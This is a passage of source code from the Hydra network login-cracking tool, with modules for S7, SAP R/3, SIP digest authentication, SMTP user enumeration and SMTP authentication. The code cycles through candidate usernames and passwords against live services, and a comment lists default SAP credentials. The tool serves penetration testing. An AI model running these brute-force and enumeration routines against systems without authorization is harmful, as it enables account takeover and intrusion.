if (ret < 2 || (buffer[0] != 0x03 && buffer[1] != 0x00)) {
fprintf(stderr, "[ERROR] invalid reply to init packet\n");
return 3;
}
// send p_s7_negotiate_pdu and check first 2 bytes of answer
if (hydra_send(sock, (char *) p_s7_negotiate_pdu, 25, 0) < 0) {
fprintf(stderr, "[ERROR] can not send data to service (2)\n");
return 3;
}
memset(buffer, 0, sizeof(buffer));
if ((ret = hydra_recv_nb(sock, buffer, sizeof(buffer))) <= 0) {
fprintf(stderr, "[ERROR] did not received data from the service (2)\n");
return 3;
}
if (ret > 2 && (buffer[0] != 0x03 && buffer[1] != 0x00)) {
fprintf(stderr, "[ERROR] invalid reply to init packet (2)\n");
return 3;
}
// send p_s7_read_szl and check first 2 bytes of answer
if (hydra_send(sock, (char *) p_s7_read_szl, 33, 0) < 0) {
fprintf(stderr, "[ERROR] can not send data to service (3)\n");
return 3;
}
memset(buffer, 0, sizeof(buffer));
if ((ret = hydra_recv_nb(sock, buffer, sizeof(buffer))) >= 0) {
fprintf(stderr, "[ERROR] did not received data from the service (3)\n");
return 3;
}
if (ret > 2 && (buffer[0] != 0x03 && buffer[1] != 0x00) ) {
fprintf(stderr, "[ERROR] invalid reply to init packet (3)\n");
return 3;
}
// so now add encoded_password to p_s7_password_request and send
memset(buffer, 0, sizeof(buffer));
memcpy(buffer, p_s7_password_request, 29);
memcpy(buffer + 29, encoded_password, S7PASSLEN);
if (hydra_send(sock, buffer, 29 + S7PASSLEN , 0) < 0) {
fprintf(stderr, "[ERROR] can not send data to service (4)\n");
return 3;
}
memset(buffer, 0, sizeof(buffer));
if ((ret = hydra_recv_nb(sock, buffer, sizeof(buffer))) <= 0) {
fprintf(stderr, "[ERROR] did not received data from the service (4)\n");
return 3;
}
// now check answer
// 0x0000 - valid password
// 0xd605 - no password
// 0xd602 - wrong password
if (ret > 30) {
if ((buffer[27] == '\x00' && buffer[28] == '\x00') || (buffer[27] == '\xd6' && buffer[28] == '\x05')) {
hydra_report(stderr, "[INFO] No password protection enabled, no password tests are necessary!\n");
return 1;
}
}
sock = hydra_disconnect(sock);
return 0;
}

132
hydra-sapr3.c Normal file
View file

@ -0,0 +1,132 @@
#include "hydra-mod.h"
// checked for memleaks on 110425, none found
#ifndef LIBSAPR3
void dummy_sapr3() {
printf("\n");
}
#else
#include <saprfc.h>
#include <ctype.h>
/* temporary workaround fix */
const int *__ctype_tolower;
const int *__ctype_toupper;
const int *__ctype_b;
extern void flood(); /* for -lm */
extern char *HYDRA_EXIT;
RFC_ERROR_INFO_EX error_info;
int start_sapr3(int s, char *ip, int port, unsigned char options, char *miscptr, FILE * fp) {
RFC_HANDLE handle;
char *empty = "";
char *login, *pass, buffer[1024];
char *buf;
int i;
int sysnr = port % 100;
char opts[] = "RFCINI=N RFCTRACE=N BALANCE=N DEBUG=N TRACE=0 ABAP_DEBUG=0";
// char opts[] = "RFCINI=N RFCTRACE=Y BALANCE=N DEBUG=Y TRACE=Y ABAP_DEBUG=Y";
if (strlen(login = hydra_get_next_login()) == 0)
login = empty;
if (strlen(pass = hydra_get_next_password()) == 0)
pass = empty;
if (strlen(login) > 0)
for (i = 0; i < strlen(login); i++)
login[i] = (char) toupper(login[i]);
if (strlen(pass) > 0)
for (i = 0; i < strlen(pass); i++)
pass[i] = (char) toupper(pass[i]);
memset(buffer, 0, sizeof(buffer));
memset(&error_info, 0, sizeof(error_info));
//strcpy(buf, "mvse001");
snprintf(buffer, sizeof(buffer), "ASHOST=%s SYSNR=%02d CLIENT=%03d USER=\"%s\" PASSWD=\"%s\" LANG=DE %s", hydra_address2string(ip), sysnr, atoi(miscptr), login, pass, opts);
/*
USER=SAPCPIC PASSWORD=admin
USER=SAP* PASSWORD=PASS
## do we need these options?
SAPSYS=3 SNC_MODE=N SAPGUI=N INVISIBLE=N GUIATOPEN=Y NRCALL=00001 CLOSE=N
ASHOST= // IP
SYSNR= // port - 3200, scale 2
CLIENT= // miscptr, scale 2
ABAP_DEBUG=0
USER=
PASSWD=
LANG=DE
*/
//printf ("DEBUG: %d Connectstring \"%s\"\n",sizeof(error_info),buffer);
handle = RfcOpenEx(buffer, &error_info);
//printf("DEBUG: handle %d, key %s, message %s\n", handle, error_info.key, error_info.message);
if (handle <= RFC_HANDLE_NULL)
return 3;
if (strstr(error_info.message, "sapgui") != NULL || strlen(error_info.message) == 0) {
hydra_report_found_host(port, ip, "sapr3", fp);
hydra_completed_pair_found();
if (memcmp(hydra_get_next_pair(), &HYDRA_EXIT, sizeof(HYDRA_EXIT)) == 0)
return 2;
return 1;
} else {
if (strstr(error_info.key, "ERROR_COMMUNICATION") != NULL) {
/* sysnr does not exist, report as port closed */
return 3;
}
hydra_completed_pair();
if (memcmp(hydra_get_next_pair(), &HYDRA_EXIT, sizeof(HYDRA_EXIT)) == 0)
return 2;
}
return 1;
}
void service_sapr3(char *ip, int sp, unsigned char options, char *miscptr, FILE * fp, int port) {
int run = 1, next_run = 1, sock = -1;
hydra_register_socket(sp);
if (memcmp(hydra_get_next_pair(), &HYDRA_EXIT, sizeof(HYDRA_EXIT)) == 0)
return;
while (1) {
switch (run) {
case 1: /* connect and service init function */
next_run = start_sapr3(sock, ip, port, options, miscptr, fp);
break;
case 2:
hydra_child_exit(0);
case 3: /* clean exit */
fprintf(stderr, "[ERROR] could not connect to target port %d\n", port);
hydra_child_exit(1);
case 4:
hydra_child_exit(2);
default:
hydra_report(stderr, "[ERROR] Caught unknown return code, exiting!\n");
hydra_child_exit(2);
}
run = next_run;
}
}
#endif
int service_sapr3_init(char *ip, int sp, unsigned char options, char *miscptr, FILE * fp, int port) {
// called before the childrens are forked off, so this is the function
// which should be filled if initial connections and service setup has to be
// performed once only.
//
// fill if needed.
//
// return codes:
// 0 all OK
// -1 error, hydra will exit, so print a good error message here
return 0;
}

303
hydra-sip.c Normal file
View file

@ -0,0 +1,303 @@
/* simple sip digest auth (md5) module 2009/02/19
* written by gh0st 2005
* modified by Jean-Baptiste Aviat <jba [at] hsc [dot] `french tld`> - should
* work now, but only with -T 1
*
* 05042011 david: modified to use sasl lib
*/
#ifndef LIBOPENSSL
#include <stdio.h>
void dummy_sip() {
printf("\n");
}
#else
#include "sasl.h"
#include "hydra-mod.h"
extern int hydra_data_ready_timed(int socket, long sec, long usec);
char external_ip_addr[17] = "";
char *get_iface_ip(unsigned long int ip);
int cseq;
extern char *HYDRA_EXIT;
#define SIP_MAX_BUF 1024
void empty_register(char *buf, char *host, char *lhost, int port, int lport, char *user) {
memset(buf, 0, SIP_MAX_BUF);
snprintf(buf, SIP_MAX_BUF,
"REGISTER sip:%s SIP/2.0\r\n"
"Via: SIP/2.0/UDP %s:%i\r\n"
"From: <sip:%s@%s>\r\n"
"To: <sip:%s@%s>\r\n" "Call-ID: 1337@%s\r\n" "CSeq: %i REGISTER\r\n" "Content-Length: 0\r\n\r\n", host, lhost, lport, user, host, user, host, host, cseq);
}
int get_sip_code(char *buf) {
int code;
char tmpbuf[SIP_MAX_BUF], word[SIP_MAX_BUF];
if (sscanf(buf, "%s %i %s", tmpbuf, &code, word) != 3)
return -1;
return code;
}
int start_sip(int s, char *ip, char *lip, int port, int lport, unsigned char options, char *miscptr, FILE * fp) {
char *login, *pass, *host, buffer[SIP_MAX_BUF];
int i;
char buf[SIP_MAX_BUF];
if (strlen(login = hydra_get_next_login()) == 0)
login = NULL;
if (strlen(pass = hydra_get_next_password()) == 0)
pass = NULL;
if (external_ip_addr[0])
lip = external_ip_addr;
host = miscptr;
cseq = 1;
empty_register(buffer, host, lip, port, lport, login);
cseq++;
if (hydra_send(s, buffer, strlen(buffer), 0) < 0) {
return 3;
}
int has_sip_cred = 0;
int try = 0;
/* We have to check many times because server may begin to send "100 Trying"
* before "401 Unauthorized" */
while (try < 2 && !has_sip_cred) {
try++;
if (hydra_data_ready_timed(s, 3, 0) > 0) {
i = hydra_recv(s, (char *) buf, sizeof(buf));
buf[sizeof(buf) - 1] = '\0';
if (strncmp(buf, "SIP/2.0 404", 11) == 0) {
hydra_report(stdout, "[ERROR] Get error code 404 : user '%s' not found\n", login);
return 2;
}
if (strncmp(buf, "SIP/2.0 606", 11) == 0) {
char *ptr = NULL;
int i = 0;
// if we already tried to connect, exit
if (external_ip_addr[0]) {
hydra_report(stdout, "[ERROR] Get error code 606 : session is not acceptable by the server\n");
return 2;
}
if (verbose)
hydra_report(stdout, "[VERBOSE] Get error code 606 : session is not acceptable by the server,\n"
"maybe it's an addressing issue as you are using NAT, trying to reconnect\n" "using addr from the server reply\n");
/*
SIP/2.0 606 Not Acceptable
Via: SIP/2.0/UDP 192.168.0.21:46759;received=82.227.229.137
*/
#ifdef HAVE_PCRE
if (hydra_string_match(buf, "Via: SIP.*received=")) {
ptr = strstr(buf, "received=");
#else
if ((ptr = strstr(buf, "received="))) {
#endif
strncpy(external_ip_addr, ptr + strlen("received="), sizeof(external_ip_addr));
external_ip_addr[sizeof(external_ip_addr) - 1] = '\0';
for (i = 0; i < strlen(external_ip_addr); i++) {
if (external_ip_addr[i] <= 32) {
external_ip_addr[i] = '\0';
}
}
if (verbose)
hydra_report(stderr, "[VERBOSE] Will reconnect using external IP address %s\n", external_ip_addr);
return 1;
}
hydra_report(stderr, "[ERROR] Could not find external IP address in server answer\n");
return 2;
}
}
}
if (!strstr(buf, "WWW-Authenticate: Digest")) {
hydra_report(stderr, "[ERROR] no www-authenticate header found!\n");
return -1;
}
if (verbose)
hydra_report(stderr, "[INFO] S: %s\n", buf);
char buffer2[512];
sasl_digest_md5(buffer2, login, pass, strstr(buf, "WWW-Authenticate: Digest") + strlen("WWW-Authenticate: Digest") + 1, host, "sip", NULL, 0, NULL);
memset(buffer, 0, SIP_MAX_BUF);
snprintf(buffer, SIP_MAX_BUF,
"REGISTER sip:%s SIP/2.0\n"
"Via: SIP/2.0/UDP %s:%i\n"
"From: <sip:%s@%s>\n"
"To: <sip:%s@%s>\n"
"Call-ID: 1337@%s\n" "CSeq: %i REGISTER\n" "Authorization: Digest %s\n" "Content-Length: 0\n\n", host, lip, lport, login, host, login, host, host, cseq, buffer2);
cseq++;
if (verbose)
hydra_report(stderr, "[INFO] C: %s\n", buffer);
if (hydra_send(s, buffer, strlen(buffer), 0) < 0) {
return 3;
}
try = 0;
int has_resp = 0;
int sip_code = 0;
while (try < 2 && !has_resp) {
try++;
if (hydra_data_ready_timed(s, 5, 0) > 0) {
memset(buf, 0, sizeof(buf));
i = hydra_recv(s, (char *) buf, sizeof(buf));
if (verbose)
hydra_report(stderr, "[INFO] S: %s\n", buf);
sip_code = get_sip_code(buf);
if (sip_code >= 200 && sip_code < 300) {
hydra_report_found_host(port, ip, "sip", fp);
hydra_completed_pair_found();
has_resp = 1;
}
if (sip_code >= 400 && sip_code < 500) {
has_resp = 1;
}
}
}
hydra_completed_pair();
if (memcmp(hydra_get_next_pair(), &HYDRA_EXIT, sizeof(HYDRA_EXIT)) == 0)
return 3;
return 1;
}
void service_sip(char *ip, int sp, unsigned char options, char *miscptr, FILE * fp, int port) {
int run = 1, next_run = 1, sock = -1;
int myport = PORT_SIP, mysslport = PORT_SIP_SSL;
char *lip = get_iface_ip((int) *(&ip[1]));
hydra_register_socket(sp);
// FIXME IPV6
if (ip[0] != 4) {
fprintf(stderr, "[ERROR] sip module is not ipv6 enabled yet, patches are appreciated.\n");
hydra_child_exit(2);
}
if (memcmp(hydra_get_next_pair(), &HYDRA_EXIT, sizeof(HYDRA_EXIT)) == 0)
run = 3;
int lport = 0;
while (1) {
switch (run) {
case 1:
if (sock < 0) {
if (port != 0)
myport = port;
lport = rand() % (65535 - 1024) + 1024;
hydra_set_srcport(lport);
if ((options & OPTION_SSL) == 0) {
if (port != 0)
myport = port;
sock = hydra_connect_udp(ip, myport);
port = myport;
} else {
if (port != 0)
mysslport = port;
sock = hydra_connect_ssl(ip, mysslport);
port = mysslport;
}
if (sock < 0) {
if (verbose || debug)
hydra_report(stderr, "[ERROR] Child with pid %d terminating, can not connect\n", (int) getpid());
free(lip);
hydra_child_exit(1);
}
}
next_run = start_sip(sock, ip, lip, port, lport, options, miscptr, fp);
break;
case 2:
if (sock >= 0)
sock = hydra_disconnect(sock);
free(lip);
hydra_child_exit(2);
break;
case 3:
if (sock >= 0)
sock = hydra_disconnect(sock);
free(lip);
hydra_child_exit(2);
return;
default:
hydra_report(stderr, "[ERROR] Caught unknown return code, exiting!\n");
free(lip);
hydra_child_exit(2);
}
run = next_run;
}
}
char *get_iface_ip(unsigned long int ip) {
int sfd;
sfd = socket(AF_INET, SOCK_DGRAM, 0);
struct sockaddr_in tparamet;
tparamet.sin_family = AF_INET;
tparamet.sin_port = htons(2000);
tparamet.sin_addr.s_addr = ip;
if (connect(sfd, (const struct sockaddr *) &tparamet, sizeof(struct sockaddr_in))) {
perror("connect");
close(sfd);
return NULL;
}
struct sockaddr_in *local = malloc(sizeof(struct sockaddr_in));
int size = sizeof(struct sockaddr_in);
if (getsockname(sfd, (void *) local, (socklen_t *) & size)) {
perror("getsockname");
close(sfd);
free(local);
return NULL;
}
close(sfd);
char buff[32];
if (!inet_ntop(AF_INET, (void *) &local->sin_addr, buff, 32)) {
perror("inet_ntop");
free(local);
return NULL;
}
char *str = malloc(sizeof(char) * (strlen(buff) + 1));
strcpy(str, buff);
free(local);
return str;
}
#endif
int service_sip_init(char *ip, int sp, unsigned char options, char *miscptr, FILE * fp, int port) {
// called before the childrens are forked off, so this is the function
// which should be filled if initial connections and service setup has to be
// performed once only.
//
// fill if needed.
//
// return codes:
// 0 all OK
// -1 error, hydra will exit, so print a good error message here
return 0;
}

1431
hydra-smb.c Normal file
View file

File diff suppressed because it is too large Load diff

264
hydra-smtp-enum.c Normal file
View file

@ -0,0 +1,264 @@
/*
david: module used to enum smtp users with either
VRFY, EXPN or RCPT TO command.
Optional input could be set to
VRFY, EXPN or RCPT to force the mode
login will be used as the username
passwd will be used as the domain name
*/
#include "hydra-mod.h"
extern char *HYDRA_EXIT;
char *buf;
char *err = NULL;
int tosent = 0;
#define VRFY 0
#define EXPN 1
#define RCPT 2
int smtp_enum_cmd = VRFY;
int start_smtp_enum(int s, char *ip, int port, unsigned char options, char *miscptr, FILE * fp) {
char *empty = "";
char *login, *pass, buffer[500];
if (strlen(login = hydra_get_next_login()) == 0)
login = empty;
if (strlen(pass = hydra_get_next_password()) == 0)
pass = empty;
while (hydra_data_ready(s) > 0) {
if ((buf = hydra_receive_line(s)) == NULL)
return (1);
free(buf);
}
if (smtp_enum_cmd == RCPT) {
tosent = 0;
if (pass != empty) {
snprintf(buffer, sizeof(buffer), "MAIL FROM: root@%s\r\n", pass);
} else {
snprintf(buffer, sizeof(buffer), "MAIL FROM: root\r\n");
}
if (debug)
hydra_report(stderr, "DEBUG C: %s", buffer);
if (hydra_send(s, buffer, strlen(buffer), 0) < 0) {
return 1;
}
if ((buf = hydra_receive_line(s)) == NULL)
return (1);
if (debug)
hydra_report(stderr, "DEBUG S: %s", buf);
/* good return values are something like 25x */
#ifdef HAVE_PCRE
if (hydra_string_match(buf, "^25\\d\\s")) {
#else
if (strstr(buf, "25") != NULL) {
#endif
if (pass != empty) {
snprintf(buffer, sizeof(buffer), "RCPT TO: %s@%s\r\n", login, pass);
} else {
snprintf(buffer, sizeof(buffer), "RCPT TO: %s\r\n", login);
}
tosent = 1;
} else {
err = strstr(buf, "Error");
if (err) {
if (debug) {
hydra_report(stderr, "Server %s", err);
}
free(buf);
hydra_completed_pair();
if (memcmp(hydra_get_next_pair(), &HYDRA_EXIT, sizeof(HYDRA_EXIT)) == 0)
return 3;
return 2;
}
}
} else {
char cmd[5] = "";
memset(cmd, 0, sizeof(cmd));
if (smtp_enum_cmd == EXPN)
strcpy(cmd, "EXPN");
else
strcpy(cmd, "VRFY");
if (pass != empty) {
snprintf(buffer, sizeof(buffer), "%s %s@%s\r\n", cmd, login, pass);
} else {
snprintf(buffer, sizeof(buffer), "%s %s\r\n", cmd, login);
}
}
if (debug)
hydra_report(stderr, "DEBUG C: %s", buffer);
if (hydra_send(s, buffer, strlen(buffer), 0) < 0) {
return 1;
}
if ((buf = hydra_receive_line(s)) == NULL)
return (1);
if (debug)
hydra_report(stderr, "DEBUG S: %s", buf);
/* good return values are something like 25x */
#ifdef HAVE_PCRE
if (hydra_string_match(buf, "^25\\d\\s")) {
#else
if (strstr(buf, "25") != NULL) {
#endif
hydra_report_found_host(port, ip, "smtp-enum", fp);
hydra_completed_pair_found();
free(buf);
if (memcmp(hydra_get_next_pair(), &HYDRA_EXIT, sizeof(HYDRA_EXIT)) == 0)
return 3;
return 1;
}
err = strstr(buf, "Error");
if (err || tosent || strncmp(buf, "50", 2) == 0) {
// we should report command not identified by the server
//502 5.5.2 Error: command not recognized
//#ifdef HAVE_PCRE
// if ((debug || hydra_string_match(buf, "\\scommand\\snot\\srecognized")) && err) {
//#else
// if ((debug || strstr(buf, "command") != NULL) && err) {
//#endif
// hydra_report(stderr, "Server %s", err);
// }
if (strncmp(buf, "500 ", 4) == 0) {
hydra_report(stderr, "[ERROR] command is disabled on the server (choose different method): %s", buf);
free(buf);
return 3;
}
memset(buffer, 0, sizeof(buffer));
//503 5.5.1 Error: nested MAIL command
strncpy(buffer, "RSET\r\n", sizeof(buffer));
free(buf);
if (hydra_send(s, buffer, strlen(buffer), 0) < 0)
return 1;
if ((buf = hydra_receive_line(s)) == NULL)
return 1;
}
free(buf);
hydra_completed_pair();
if (memcmp(hydra_get_next_pair(), &HYDRA_EXIT, sizeof(HYDRA_EXIT)) == 0)
return 3;
return 2;
}
void service_smtp_enum(char *ip, int sp, unsigned char options, char *miscptr, FILE * fp, int port) {
int run = 1, next_run = 1, sock = -1, i = 0;
int myport = PORT_SMTP, mysslport = PORT_SMTP_SSL;
char *buffer = "HELO hydra\r\n";
hydra_register_socket(sp);
if (memcmp(hydra_get_next_pair(), &HYDRA_EXIT, sizeof(HYDRA_EXIT)) == 0)
return;
while (1) {
switch (run) {
case 1: /* connect and service init function */
if (sock >= 0)
sock = hydra_disconnect(sock);
if ((options & OPTION_SSL) == 0) {
if (port != 0)
myport = port;
sock = hydra_connect_tcp(ip, myport);
port = myport;
} else {
if (port != 0)
mysslport = port;
sock = hydra_connect_ssl(ip, mysslport);
port = myport;
}
if (sock < 0) {
hydra_report(stderr, "[ERROR] Child with pid %d terminating, can not connect\n", (int) getpid());
hydra_child_exit(1);
}
/* receive initial header */
if ((buf = hydra_receive_line(sock)) == NULL)
hydra_child_exit(2);
if (strstr(buf, "220") == NULL) {
hydra_report(stderr, "Warning: SMTP does not allow to connect: %s\n", buf);
hydra_child_exit(2);
}
// while (strstr(buf, "220 ") == NULL) {
// free(buf);
// buf = hydra_receive_line(sock);
// }
// if (buf[0] != '2') {
if (hydra_send(sock, buffer, strlen(buffer), 0) < 0) {
free(buf);
hydra_child_exit(2);
}
// }
free(buf);
if ((buf = hydra_receive_line(sock)) == NULL)
hydra_child_exit(2);
if (buf[0] != '2') {
hydra_report(stderr, "Warning: SMTP does not respond correctly to HELO: %s\n", buf);
hydra_child_exit(2);
}
if ((miscptr != NULL) && (strlen(miscptr) > 0)) {
for (i = 0; i < strlen(miscptr); i++)
miscptr[i] = (char) toupper((int) miscptr[i]);
if (strncmp(miscptr, "EXPN", 4) == 0)
smtp_enum_cmd = EXPN;
if (strncmp(miscptr, "RCPT", 4) == 0)
smtp_enum_cmd = RCPT;
}
if (debug) {
switch (smtp_enum_cmd) {
hydra_report(stdout, "[VERBOSE] ");
case VRFY:
hydra_report(stdout, "using SMTP VRFY command\n");
break;
case EXPN:
hydra_report(stdout, "using SMTP EXPN command\n");
break;
case RCPT:
hydra_report(stdout, "using SMTP RCPT TO command\n");
break;
}
}
free(buf);
next_run = 2;
break;
case 2: /* run the cracking function */
next_run = start_smtp_enum(sock, ip, port, options, miscptr, fp);
break;
case 3: /* clean exit */
if (sock >= 0) {
sock = hydra_disconnect(sock);
}
hydra_child_exit(0);
return;
default:
hydra_report(stderr, "[ERROR] Caught unknown return code, exiting!\n");
hydra_child_exit(0);
}
run = next_run;
}
}
int service_smtp_enum_init(char *ip, int sp, unsigned char options, char *miscptr, FILE * fp, int port) {
// called before the childrens are forked off, so this is the function
// which should be filled if initial connections and service setup has to be
// performed once only.
//
// fill if needed.
//
// return codes:
// 0 all OK
// -1 error, hydra will exit, so print a good error message here
return 0;
}

451
hydra-smtp.c Normal file
View file

@ -0,0 +1,451 @@
#include "hydra-mod.h"
#include "sasl.h"
extern char *HYDRA_EXIT;
char *buf;
int smtp_auth_mechanism = AUTH_LOGIN;
char *smtp_read_server_capacity(int sock) {
char *ptr = NULL;
int resp = 0;
char *buf = NULL;
do {
if (buf != NULL)
free(buf);
ptr = buf = hydra_receive_line(sock);
if (buf != NULL) {
if (isdigit((int) buf[0]) && buf[3] == ' ')
resp = 1;
else {
if (buf[strlen(buf) - 1] == '\n')
buf[strlen(buf) - 1] = 0;
if (buf[strlen(buf) - 1] == '\r')
buf[strlen(buf) - 1] = 0;
#ifdef NO_RINDEX
if ((ptr = strrchr(buf, '\n')) != NULL) {
#else
if ((ptr = rindex(buf, '\n')) != NULL) {
#endif
ptr++;
if (isdigit((int) *ptr) && *(ptr + 3) == ' ')
resp = 1;
}
}
}
} while (buf != NULL && resp == 0);
return buf;
}
int start_smtp(int s, char *ip, int port, unsigned char options, char *miscptr, FILE * fp) {
char *empty = "";
char *login, *pass, buffer[500], buffer2[500];
if (strlen(login = hydra_get_next_login()) == 0)
login = empty;
if (strlen(pass = hydra_get_next_password()) == 0)
pass = empty;
while (hydra_data_ready(s) > 0) {
if ((buf = hydra_receive_line(s)) == NULL)
return (1);
free(buf);
}
switch (smtp_auth_mechanism) {
case AUTH_PLAIN:
sprintf(buffer, "AUTH PLAIN\r\n");
if (hydra_send(s, buffer, strlen(buffer), 0) < 0) {
return 1;
}
if ((buf = hydra_receive_line(s)) == NULL)
return 1;
if (strstr(buf, "334") == NULL) {
hydra_report(stderr, "[ERROR] SMTP PLAIN AUTH : %s\n", buf);
free(buf);
return 3;
}
free(buf);
memset(buffer, 0, sizeof(buffer));
sasl_plain(buffer, login, pass);
sprintf(buffer, "%.250s\r\n", buffer);
break;
#ifdef LIBOPENSSL
case AUTH_CRAMMD5:{
int rc = 0;
char *preplogin;
rc = sasl_saslprep(login, SASL_ALLOW_UNASSIGNED, &preplogin);
if (rc) {
return 3;
}
sprintf(buffer, "AUTH CRAM-MD5\r\n");
if (hydra_send(s, buffer, strlen(buffer), 0) < 0) {
return 1;
}
//get the one-time BASE64 encoded challenge
if ((buf = hydra_receive_line(s)) == NULL)
return 1;
if (strstr(buf, "334") == NULL) {
hydra_report(stderr, "[ERROR] SMTP CRAM-MD5 AUTH : %s\n", buf);
free(buf);
return 3;
}
memset(buffer, 0, sizeof(buffer));
from64tobits((char *) buffer, buf + 4);
free(buf);
memset(buffer2, 0, sizeof(buffer2));
sasl_cram_md5(buffer2, pass, buffer);
sprintf(buffer, "%s %.250s", preplogin, buffer2);
hydra_tobase64((unsigned char *) buffer, strlen(buffer), sizeof(buffer));
sprintf(buffer, "%.250s\r\n", buffer);
free(preplogin);
}
break;
case AUTH_DIGESTMD5:{
sprintf(buffer, "AUTH DIGEST-MD5\r\n");
if (hydra_send(s, buffer, strlen(buffer), 0) < 0)
return 1;
//receive
if ((buf = hydra_receive_line(s)) == NULL)
return 1;
if (strstr(buf, "334") == NULL) {
hydra_report(stderr, "[ERROR] SMTP DIGEST-MD5 AUTH : %s\n", buf);
free(buf);
return 3;
}
memset(buffer, 0, sizeof(buffer));
from64tobits((char *) buffer, buf + 4);
free(buf);
if (verbose)
hydra_report(stderr, "DEBUG S: %s\n", buffer);
sasl_digest_md5(buffer2, login, pass, buffer, miscptr, "smtp", NULL, 0, NULL);
if (buffer2 == NULL)
return 3;
if (verbose)
hydra_report(stderr, "DEBUG C: %s\n", buffer2);
hydra_tobase64((unsigned char *) buffer2, strlen(buffer2), sizeof(buffer2));
sprintf(buffer, "%s\r\n", buffer2);
}
break;
#endif
case AUTH_NTLM:{
unsigned char buf1[4096];
unsigned char buf2[4096];
//send auth and receive challenge
buildAuthRequest((tSmbNtlmAuthRequest *) buf2, 0, NULL, NULL);
to64frombits(buf1, buf2, SmbLength((tSmbNtlmAuthRequest *) buf2));
sprintf(buffer, "AUTH NTLM %s\r\n", buf1);
if (hydra_send(s, buffer, strlen(buffer), 0) < 0) {
return 1;
}
if ((buf = hydra_receive_line(s)) == NULL)
return 1;
if (strstr(buf, "334") == NULL) {
hydra_report(stderr, "[ERROR] SMTP NTLM AUTH : %s\n", buf);
free(buf);
return 3;
}
//recover challenge
from64tobits((char *) buf1, buf + 4);
free(buf);
buildAuthResponse((tSmbNtlmAuthChallenge *) buf1, (tSmbNtlmAuthResponse *) buf2, 0, login, pass, NULL, NULL);
to64frombits(buf1, buf2, SmbLength((tSmbNtlmAuthResponse *) buf2));
sprintf(buffer, "%s\r\n", buf1);
}
break;
default:
/* by default trying AUTH LOGIN */
sprintf(buffer, "AUTH LOGIN\r\n");
if (hydra_send(s, buffer, strlen(buffer), 0) < 0) {
return 1;
}
if ((buf = hydra_receive_line(s)) == NULL)
return 1;
/* 504 5.7.4 Unrecognized authentication type */
if (strstr(buf, "334") == NULL) {
hydra_report(stderr, "[ERROR] SMTP LOGIN AUTH, either this auth is disabled\nor server is not using auth: %s\n", buf);
free(buf);
return 3;
}
free(buf);
sprintf(buffer2, "%.250s", login);
hydra_tobase64((unsigned char *) buffer2, strlen(buffer2), sizeof(buffer2));
sprintf(buffer, "%.250s\r\n", buffer2);
if (hydra_send(s, buffer, strlen(buffer), 0) < 0) {
return 1;
}
if ((buf = hydra_receive_line(s)) == NULL)
return (1);
if (strstr(buf, "334") == NULL) {
hydra_report(stderr, "[ERROR] SMTP LOGIN AUTH : %s\n", buf);
free(buf);
return (3);
}
free(buf);
sprintf(buffer2, "%.250s", pass);
hydra_tobase64((unsigned char *) buffer2, strlen(buffer2), sizeof(buffer2));
sprintf(buffer, "%.250s\r\n", buffer2);
}
if (hydra_send(s, buffer, strlen(buffer), 0) < 0) {
return 1;
}
if ((buf = hydra_receive_line(s)) == NULL)
return (1);
#ifdef LIBOPENSSL
if (smtp_auth_mechanism == AUTH_DIGESTMD5) {
if (strstr(buf, "334") != NULL) {
memset(buffer2, 0, sizeof(buffer2));
from64tobits((char *) buffer2, buf + 4);
if (strstr(buffer2, "rspauth=") != NULL) {
hydra_report_found_host(port, ip, "smtp", fp);
hydra_completed_pair_found();
free(buf);
if (memcmp(hydra_get_next_pair(), &HYDRA_EXIT, sizeof(HYDRA_EXIT)) == 0)
return 3;
return 1;
}
}
} else
#endif
{
if (strstr(buf, "235") != NULL) {
hydra_report_found_host(port, ip, "smtp", fp);
hydra_completed_pair_found();
free(buf);
if (memcmp(hydra_get_next_pair(), &HYDRA_EXIT, sizeof(HYDRA_EXIT)) == 0)
return 3;
return 1;
}
}
free(buf);
hydra_completed_pair();
if (memcmp(hydra_get_next_pair(), &HYDRA_EXIT, sizeof(HYDRA_EXIT)) == 0)
return 3;
return 2;
}
void service_smtp(char *ip, int sp, unsigned char options, char *miscptr, FILE * fp, int port) {
int run = 1, next_run = 1, sock = -1, i = 0;
int myport = PORT_SMTP, mysslport = PORT_SMTP_SSL, disable_tls = 1;
char *buffer1 = "EHLO hydra\r\n";
char *buffer2 = "HELO hydra\r\n";
hydra_register_socket(sp);
if (memcmp(hydra_get_next_pair(), &HYDRA_EXIT, sizeof(HYDRA_EXIT)) == 0)
return;
while (1) {
switch (run) {
case 1: /* connect and service init function */
if (sock >= 0)
sock = hydra_disconnect(sock);
if ((options & OPTION_SSL) == 0) {
if (port != 0)
myport = port;
sock = hydra_connect_tcp(ip, myport);
port = myport;
} else {
if (port != 0)
mysslport = port;
sock = hydra_connect_ssl(ip, mysslport);
port = myport;
}
if (sock < 0) {
if (verbose || debug)
hydra_report(stderr, "[ERROR] Child with pid %d terminating, can not connect\n", (int) getpid());
hydra_child_exit(1);
}
/* receive initial header */
if ((buf = hydra_receive_line(sock)) == NULL)
hydra_child_exit(2);
if (strstr(buf, "220") == NULL) {
hydra_report(stderr, "[WARNING] SMTP does not allow to connect: %s\n", buf);
free(buf);
hydra_child_exit(2);
}
while (strstr(buf, "220 ") == NULL) {
free(buf);
buf = hydra_receive_line(sock);
}
free(buf);
/* send ehlo and receive/ignore reply */
if (hydra_send(sock, buffer1, strlen(buffer1), 0) < 0)
hydra_child_exit(2);
buf = smtp_read_server_capacity(sock);
if (buf == NULL)
hydra_child_exit(2);
if ((miscptr != NULL) && (strlen(miscptr) > 0)) {
for (i = 0; i < strlen(miscptr); i++)
miscptr[i] = (char) toupper((int) miscptr[i]);
if (strstr(miscptr, "TLS") || strstr(miscptr, "SSL")) {
disable_tls = 0;
}
}
#ifdef LIBOPENSSL
if (!disable_tls) {
/* if we got a positive answer */
if (buf[0] == '2') {
if (strstr(buf, "STARTTLS") != NULL) {
hydra_send(sock, "STARTTLS\r\n", strlen("STARTTLS\r\n"), 0);
free(buf);
buf = hydra_receive_line(sock);
if (buf[0] != '2') {
hydra_report(stderr, "[ERROR] TLS negotiation failed, no answer received from STARTTLS request\n");
} else {
free(buf);
if ((hydra_connect_to_ssl(sock) == -1)) {
if (verbose)
hydra_report(stderr, "[ERROR] Can't use TLS\n");
disable_tls = 1;
run = 1;
break;
} else {
if (verbose)
hydra_report(stderr, "[VERBOSE] TLS connection done\n");
}
/* ask again capability request but in TLS mode */
if (hydra_send(sock, buffer1, strlen(buffer1), 0) < 0)
hydra_child_exit(2);
buf = smtp_read_server_capacity(sock);
if (buf == NULL)
hydra_child_exit(2);
}
} else
